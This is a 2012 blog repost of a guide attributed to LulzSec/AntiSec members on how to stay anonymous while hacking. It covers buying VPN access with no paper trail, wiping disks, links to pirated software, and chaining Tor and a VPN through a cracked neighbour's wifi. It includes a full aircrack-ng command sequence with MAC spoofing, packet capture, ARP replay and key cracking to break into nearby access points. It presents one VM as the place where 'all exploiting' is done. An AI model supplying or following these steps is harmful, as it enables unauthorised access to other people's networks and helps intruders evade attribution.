Friday, March 23, 2012

how to be a Ghost on internet by lulzsec

Its a very interesting post by lulzec members i would like to share it


Want to stay safe online?

By @AntiSecOp

Required files:VMWare Workstation:

http://www.demonoid.me/files/details/2787488/008172892720/Windows 7 Ultimate: http://www.demonoid.me/files/details/2811393/003064834770/BackTrack 5 R1 VMWare: http://www.backtrack-linux.org/ajax/download_redirect.php?id=BT5R1-GNOME-VM-32.7zpfsense: http://files.chi.pfsense.org/mirror/downloads/pfSense-2.0.1-RELEASE-amd64.iso.gzUbuntu Live CD: http://www.ubuntu.com/start-download?distro=desktop&bits=32&release=latest


Required Hardware:
Virtualization supported CPU
4GB RAM
USB wifi adapter supporting packet injection:http://www.amazon.com/Alfa-802-11b-Wireless-Original-9dBi/dp/B001O9X9EU/ref=sr_1_2?ie=UTF8&qid=1328768355&sr=8-2


VPN Account without paper trail
  • Purchase prepaid visa card with cash
  • Purchase Bitcoins with Money Order
  • Donate Bitcoins to different account
  • Purchase VPN account with bitcoins


VPN ServicesoVPN.to
  • www.CCHeaven.in
  • https://www.vpntunnel.se/ 
  • https://www.ipredator.se/?lang=en 
  • http://strongvpn.com/



Step One
  • Enable Boot and Setup page BIOS password
  • Turn computer on, press key to enter Setup. Usually F1, F2, F11, Del, something similar. Then go to the Security tab


Step Two
  • Boot Ubuntu LiveCD to cleanly wipe hard drive
  • After booting LiveCD, open up terminal and type sudo "fdisk -l" to get a list of disks and partitions
  • Use the wipe command on each partition that is listed with the above commandie "sudo wipe /dev/sda1"
  • Repeat for each drive (sdb, sdc) and each partition (sda1, sda2)
  • Reboot


Step Three
  • Install Windows 7 Ultimate and shred free space
  • Boot from Windows disk and install
  • After clean install, install fileshredder http://www.fileshredder.org
  • Run fileshredder using "Secure Erasing Algorithm with 7 passes"Reboot
  • Enable BitLocker drive encryption. Safe key to USB stick
  • Reboot
  • Run Windows Update
  • Turn off Swap space (Control Panel > System and Security > Advanced > Performance > Disable Virtual Memory
  • Reboot


Step Four
Install VMWare  


Step Five
  • BackTrack 5 R1 Virtual Machine to be used for cracking WiFi
  • Open VMWare and import the BackTrack 5 R1 VMWare image (link above)
  • Set VM to 256MB RAM
  • Create a Network Adapter (VMNet0)
  • Directly attach USB wifi adapter (VM > Removable Devices > Check Wireless Adapter)
  • Bridge eth0 to wlan0

Easy Mode method:
  • apt-get -y install network-manager
  • rm /etc/network/interfaces
  • reboot
  • Open Network Manager
  • eth0 IPv4 Settings > Method > Shared to other computers

  • Use aircrack-ng to crack surrounding AP's
  • airmon-ng stop wlan0
  • ifconfig wlan0 down
  • macchanger --mac 00:11:22:33:44:55 wlan0
  • airmon-ng start wlan0
  • airodump-ng wlan0
  • Get SSID and channel for next step
  • airodump-ng -c (channel #) -w (file name) --bssid (bssid) wlan0
  • Let this sit until you have plenty of data points
  • aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
  • Look for successful ACK
  • aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
  • Also let this run for a while, look for 10k ACK's aircrack-ng -b (bssid) (file name-01.cap)
  • Connect to SSID


Step Six
  • Pfsense install to use VPN
  • 8 GB of Hard Drive space
  • 256MB RAM
  • Two Network Adapters (VMnet0 and VMnet1)
  • After installing from the downloaded ISO, set WAN to VMnet0 and LAN to VMnet1. You should get a WAN dhcp IP from VM#1
  • Assign LAN IP and enable DHCP (192.168.1.1/24)

Step Seven
  • Install TorBox to anonymize ALL traffic
  • 128MB RAM
  • 5GB Hard Drive space
  • One Network Adapter (VMnet1)
  • Follow Torproject.org instructions for TorBox https://trac.torproject.org/projects/tor/wiki/doc/TorBOX
  • Open a browser and go to http://192.168.1.1
  • Login to pfsense with admin/pfsense and change password, force https, and enable all logging
  • Go to PPTP VPN Tab and input info from VPN info above


Step Eight
  • BackTrack 5 R1 VM for all cracking/penetration testing/everything
  • Import another BT5 vmware image
  • 512MB RAM
  • One Network Adapter (VMnet1)
  • Set default Gateway to match the IP of your previous VM (TorBox)
  • ALL data will now travel securely (BT5 > Tor Network > Over VPN > Internet using cracked wifi)
  • Download Tor Bundle from torproject.org
  • Use FireFox Portable bunlded with Tor Bundle (more secure)
  • All exploiting/penetration testing, cracking, etc is done on this VM


Step Nine
Encrypt All VM's
Open settings for Each VM in VMWare
Under Options > Enable Encryption
Set secure password

Torchat: OfflineE-mail: antisec@tormail.net

Twitter: https://twitter.com/AntiSecOp

0 comments:

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More